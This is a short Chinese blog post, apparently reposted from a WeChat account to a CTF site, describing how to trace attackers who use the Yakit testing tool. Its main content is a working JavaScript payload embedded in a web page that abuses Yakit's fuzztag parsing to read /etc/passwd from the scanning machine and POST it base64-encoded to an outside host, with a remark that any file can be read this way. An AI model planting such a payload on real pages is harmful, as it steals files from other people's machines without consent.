利用yakit功能特性溯源攻击者

杜绝废话,随便在页面上嵌入一个js,内容是:

<script>
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://yakit.com/filesubmit");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(`file={{base64enc(file(/etc/passwd))}}`);
</script>

可自由发挥,读任意文件。

利用yakit功能特性溯源攻击者

原因:yakit默认不会对经过MITM PROXY的流量中的fuzztag进行解析,但是经过插件时会被解析,所以这也是利用限制。

顺便吐槽:yakit跑起来卡卡的,啥时候能优化到和burp一样啊。


原文始发于微信公众号(Medi0cr1ty):利用yakit功能特性溯源攻击者

版权声明:admin 发表于 2023年8月10日 下午9:51。
转载请注明:利用yakit功能特性溯源攻击者 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...